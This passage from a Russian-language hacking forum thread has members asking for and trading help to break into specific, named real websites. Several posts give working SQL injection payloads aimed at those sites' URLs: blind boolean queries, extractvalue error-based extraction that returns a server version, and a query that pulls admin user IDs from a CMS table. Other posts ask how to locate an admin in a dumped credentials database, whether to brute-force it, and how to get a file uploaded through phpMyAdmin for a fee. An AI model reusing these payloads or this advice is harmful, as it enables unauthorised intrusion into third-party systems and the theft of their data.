Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    Поиграть руками с логикой. Вероятно это и не скуля вообще, а нестандартное поведение которое и задетектил ваш софт приняв это за sql-injection
     
    xuanruou, crlf and Baskin-Robbins like this.
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...
    Code:
    https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160
    Code:
    https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+select+111,222+--+
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Тут только слепая

    tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+and+if((select+count(*)+from+information_schema.tables+limit+0,1)=307,1,2)=1+--+
     
    _________________________
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите, что можно сделать? вывод в коде
    Code:
    view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262
    Code:
    SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
     
  5. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    help to inject here "from admin"

    return=&username=sdsadssda%27+or+1+group+by+mid(user(),rand(0))having+avg(0)%23&password=dsadsada

    return=&username=sdsadssda%27+or+1+group+by+mid(user(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
     
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Немного извращенно, но работать будет

    /poi/extractvalue(1,concat(0x3a,(select@@version)))/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262

    Code:
    XPATH syntax error: ':5.5.62-0ubuntu0.14.04.1'</span>' (46 chars)
    we are need full url for understanding filters
     
    _________________________
  7. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
  8. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Как обойти where?
    Code:
    https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and/**/(extractvalue/*a*/(0,concat/**//*a*/(0,(select/**//*a*/(uid)from(be_users)where(admin=1)))))%23
     
  10. Chachavar

    Chachavar New Member

    Joined:
    27 May 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте нужен совет. Сайт - БД User pass есть как найти там админа на сайте есть admin.php и форум, модера нашел тупо по нейму слил User_name . Куда копать где его искать ? Брутить? не все слил ибо слепая....
     
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    что за форум? обычно админ id=1
     
  12. Chachavar

    Chachavar New Member

    Joined:
    27 May 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Сайт при нем форум в admin.php вбиваеш что либо не че не показывает за что зацепиться для брута либо я туплю уже. имеете виду в БД первый admin в таблице users? в панеле admin.php написанно не логин а ID Админа

    походу две базы на сайте msql и mssql такое возможно? сильно не пинать....
     
    #2952 Chachavar, 7 Dec 2021
    Last edited: 7 Dec 2021
  13. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Есть input в <form>, могу выйти из атрибута инпута добавить onclick и сделать XSS(за пределы input не могу выйти), но форма настроена на авто .submit могу я анулировать отправку формы или без вариантов?
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Что можно сделать с этой скулей?
    Code:
    https://www.aric.de/datenbanken/online_recherche/?no_cache=1&schlagwort_mit2=44&schlagwort_ohne=435&suchen=Suchen
     
  15. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    есть слепая инъекция в influxdb вида history?name=alex'%20or%201=1-- Кто нибудь знает как в этой субд раскрутить слепую скулю или вывести хоть какие то нужные данные? help please
     
  16. avitodebit

    avitodebit New Member

    Joined:
    6 Mar 2022
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую всех. Нахожу постоянно уязвимости типа
    CVE-2020-11023
    CVE-2020-11022
    CVE-2015-9251
    CVE-2019-11358
    Уже не пинайте сильно новичка, а как воспользоваться этим видом уязвимостей. Вроде можно получить удалённый доступ к машине и вебсайту. Но в поиске ничего толкового найти не могу
     
  17. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Ни одна из уязвимостей не позволяет получить удалённого доступа (RCE). Все уязвимости касаются клиентских JS библиотек. Которые, в теории, при определённом стечении обстоятельств, позволят провести XSS атаку. Что позволит атаковать администратора для дальнейшего продвижения к цели.
     
    erwerr2321 likes this.
  18. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    Hi
    Any method/exploit for PHP 5.6.40 safe mode bypass ?

    Thanks !
     
  19. holdik

    holdik New Member

    Joined:
    4 Nov 2017
    Messages:
    13
    Likes Received:
    4
    Reputations:
    2
    Может кто-нибудь пролить файл через phpmyadmin 3.3.7 ? Нужна любая полезная информация, за вознаграждение
     
  20. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    Подскажите реально ли что-то сделать в таком случае?

    Code:
    $ch = curl_init('http://site.com/page.php?file='.$_GET['file']);